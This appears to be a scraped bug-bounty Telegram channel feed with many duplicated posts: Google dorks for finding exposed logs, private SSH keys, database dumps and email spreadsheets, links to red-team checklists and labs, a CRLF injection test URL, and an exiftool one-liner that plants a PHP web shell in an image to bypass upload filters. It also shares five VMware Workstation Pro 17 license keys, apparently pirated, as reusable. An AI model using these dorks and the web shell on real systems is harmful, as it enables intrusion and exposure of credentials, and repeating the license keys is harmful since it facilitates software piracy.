🎉 Google Dorks for Bug Bounty
1-allintext:username filetype:log
2-inurl:/proc/self/cwd
3-intitle:"index of" inurl:ftp
4-filetype:log username putty
5-filetype:xls inurl:"email.xls"
6-intitle:index.of id_rsa -id_rsa.pub
7-"index of" "database.sql.zip"
8-intitle:"Index of" wp-admin
9-intitle:"Apache2 Ubuntu Default Page: It works"
10-"Index of" inurl:phpmyadmin
11-inurl:Dashboard.jspa intext:"Atlassian Jira Project Management Software"
12-inurl:app/kibana intext:Loading Kibana
13-inurl:_cpanel/forgotpwd
14-allintitle: restricted filetype:doc site:gov
#bugbountytips
1-allintext:username filetype:log
2-inurl:/proc/self/cwd
3-intitle:"index of" inurl:ftp
4-filetype:log username putty
5-filetype:xls inurl:"email.xls"
6-intitle:index.of id_rsa -id_rsa.pub
7-"index of" "database.sql.zip"
8-intitle:"Index of" wp-admin
9-intitle:"Apache2 Ubuntu Default Page: It works"
10-"Index of" inurl:phpmyadmin
11-inurl:Dashboard.jspa intext:"Atlassian Jira Project Management Software"
12-inurl:app/kibana intext:Loading Kibana
13-inurl:_cpanel/forgotpwd
14-allintitle: restricted filetype:doc site:gov
#bugbountytips
👍15🔥5❤3🥰2⚡1
✨What do you prefer In any Educational/Tutorial Video ? 👇
Anonymous Poll
43%
Low Lofi / Soft Music in Background
57%
No Music at All. Just Speak
🤔3🥰1🐳1🤨1
☃️Red Teaming Pentest Checklist☃️
➡️ Windows Privilege Escalation
➡️ Lateral Movement
➡️ Domain Persistence
and much more...
🔗 Link: https://github.com/netbiosX/Checklists
#bugbounty #infosec #hacking #cybersecurity
➡️ Windows Privilege Escalation
➡️ Lateral Movement
➡️ Domain Persistence
and much more...
🔗 Link: https://github.com/netbiosX/Checklists
#bugbounty #infosec #hacking #cybersecurity
👍5🔥4🥰1😱1
🌟Offensive Recon for Bug Bounty Hunters
• By
@harshbothra_
• PPT : https://speakerdeck.com/harshbothra/offensive-recon-for-bug-bounty-hunters
#bugbounty #infosec #cybersecurity
• By
@harshbothra_
• PPT : https://speakerdeck.com/harshbothra/offensive-recon-for-bug-bounty-hunters
#bugbounty #infosec #cybersecurity
🔥4😍2👏1
💥FREE labs to practice mobile app pentesting 👇🏻
>. https://code.google.com/archive/p/dvaa/
>. https://github.com/prateek147/DVIA-v2
>. https://securitycompass.github.io/iPhoneLabs/
>. https://code.google.com/archive/p/owasp-igoat/
>. https://maddiestone.github.io/AndroidAppRE/
>. https://ctf.hpandro.raviramesh.info/
#bugbounty #infosec #hacking #cybersecurity #bugbountytips h
>. https://code.google.com/archive/p/dvaa/
>. https://github.com/prateek147/DVIA-v2
>. https://securitycompass.github.io/iPhoneLabs/
>. https://code.google.com/archive/p/owasp-igoat/
>. https://maddiestone.github.io/AndroidAppRE/
>. https://ctf.hpandro.raviramesh.info/
#bugbounty #infosec #hacking #cybersecurity #bugbountytips h
👍8🥰3👏1
Mostly Use 🔍 Engine By Hacker
1. Fofa.so
2. Wigle.net
3. Hunter.io
4. Shodan.io
5. Onyphe.io
6. Zoomeye.org
7. Ghostproject.fr
8. App.binaryedge.io
9. Viz.Greynoise.io/table
1. Fofa.so
2. Wigle.net
3. Hunter.io
4. Shodan.io
5. Onyphe.io
6. Zoomeye.org
7. Ghostproject.fr
8. App.binaryedge.io
9. Viz.Greynoise.io/table
👨💻8🔥5👍2
🦸Bug Bounty Playlist Frome Another Amazing Hacker :
https://youtube.com/playlist?list=PLM4kqXhW2ZOFdoUPImshvTqScacTlHgnq
#bugbounty #infosec #cybersecurity #hacking
https://youtube.com/playlist?list=PLM4kqXhW2ZOFdoUPImshvTqScacTlHgnq
#bugbounty #infosec #cybersecurity #hacking
❤8👍1🥰1😱1🤩1
Note.png
456 KB
🔥9❤3👍3
🔥💥 HTTP Desync Attack (Request Smuggling) - Mass Account Takeover at a Cryptocurrency based asset and 121 other websites 🔯✅🦸
Link : https://github.com/AnkitCuriosity/Write-Ups/blob/main/HTTP%20Desync%20Attack%20(Request%20Smuggling).md
Link : https://github.com/AnkitCuriosity/Write-Ups/blob/main/HTTP%20Desync%20Attack%20(Request%20Smuggling).md
GitHub
Write-Ups/HTTP Desync Attack (Request Smuggling).md at main · AnkitCuriosity/Write-Ups
Write-ups of my findings. Contribute to AnkitCuriosity/Write-Ups development by creating an account on GitHub.
👍5🥰1
Which Software You Use for Virtual Machine ?
Anonymous Poll
56%
Vmware
37%
Oracle's Virtual Box
3%
Hyper-v
5%
Other
👍2👏1
I love ❤️ you all of you so much
Here are the license key for VMware workstation Pro 17 :
1. MC60H-DWHD5-H80U9-6V85M-8280D
2.
4A4RR-813DK-M81A9-4U35H-06KND
3.
NZ4RR-FTK5H-H81C1-Q30QH-1V2LA
4.
4C21U-2KK9Q-M8130-4V2QH-CF810
5.
4Y09U-AJK97-089Z0-A3054-83KLA
No limit to avail, these license key can you use multiple times
Here are the license key for VMware workstation Pro 17 :
1. MC60H-DWHD5-H80U9-6V85M-8280D
2.
4A4RR-813DK-M81A9-4U35H-06KND
3.
NZ4RR-FTK5H-H81C1-Q30QH-1V2LA
4.
4C21U-2KK9Q-M8130-4V2QH-CF810
5.
4Y09U-AJK97-089Z0-A3054-83KLA
No limit to avail, these license key can you use multiple times
❤57👍17🥰4👏4🎉4👌2
Bug Bounty Reports in Thread 🧵
Bug : GitHub For Bypassing Filtration
oF HTML tags [ Part - 1 ]
#bugbounty #infosec #hacking #cybersecurity
Bounty : $10000
Link : https://twitter.com/Vuln_Reports/status/1595017974045294594?s=20&t=BKUJh2QGdnwZ3jmwFwbbhQ
Bug : GitHub For Bypassing Filtration
oF HTML tags [ Part - 1 ]
#bugbounty #infosec #hacking #cybersecurity
Bounty : $10000
Link : https://twitter.com/Vuln_Reports/status/1595017974045294594?s=20&t=BKUJh2QGdnwZ3jmwFwbbhQ
👍5❤2🔥2🤩1
Check For CRLF injection in it 🎉
When webapp redirects you from http to https
For eX: http://example.com/%0d%0aTest:%20Test
and simultaneously check your developer's network tab with 301 and 302, Check the header 😃
#bugbounty #infosec
When webapp redirects you from http to https
For eX: http://example.com/%0d%0aTest:%20Test
and simultaneously check your developer's network tab with 301 and 302, Check the header 😃
#bugbounty #infosec
🤩6❤3👍3🥰1
All Security Assessment Wordlists 📃 : 👇
in One Place
• https://github.com/danielmiessler/SecLists
• https://github.com/Dormidera/WordList-Compendium
• https://github.com/kaonashi-passwords/Kaonashi
• https://github.com/google/fuzzing/tree/master/dictionaries
• https://crackstation.net/crackstation-wordlist-password-cracking-dictionary.htm
#bugbounty #Infosec
in One Place
• https://github.com/danielmiessler/SecLists
• https://github.com/Dormidera/WordList-Compendium
• https://github.com/kaonashi-passwords/Kaonashi
• https://github.com/google/fuzzing/tree/master/dictionaries
• https://crackstation.net/crackstation-wordlist-password-cracking-dictionary.htm
#bugbounty #Infosec
🔥8👍6
General Discussion On :
IDOR CSRF AND ACCOUNT TAKEOVERS with HARSH BOTHRA
Link : https://youtu.be/kwePER0er84
#bugbounty #infosec #cybersecurity
IDOR CSRF AND ACCOUNT TAKEOVERS with HARSH BOTHRA
Link : https://youtu.be/kwePER0er84
#bugbounty #infosec #cybersecurity
YouTube
BUG BOUNTY - IDOR CSRF AND ACCOUNT TAKEOVERS with HARSH BOTHRA ||ZERO DAY EP 02
Cyberhawk Security session with guest HARSH BOTHRA and host NJAY.
👽TOPICS WE COVERED :
-Life/Career Journey
-Bug Bounty
-IDOR, CSRF, ACCOUNT TAKEOVERS
-Vulnerability Chaining
-Vulns and Methodology
-Red-Team
-How to become a Synack Red Teamer
CONNECT…
👽TOPICS WE COVERED :
-Life/Career Journey
-Bug Bounty
-IDOR, CSRF, ACCOUNT TAKEOVERS
-Vulnerability Chaining
-Vulns and Methodology
-Red-Team
-How to become a Synack Red Teamer
CONNECT…
👍9👎1🤩1
Bypass File Upload Filtering :
In image :
exiftool -Comment='<?php echo "<pre>"; system($_GET['cmd']); ?>' shell.jpg
mv shell.jpg shell.php.jpg
#bugbountytip #infosec #cybersecuritytips
In image :
exiftool -Comment='<?php echo "<pre>"; system($_GET['cmd']); ?>' shell.jpg
mv shell.jpg shell.php.jpg
#bugbountytip #infosec #cybersecuritytips
👍15😍5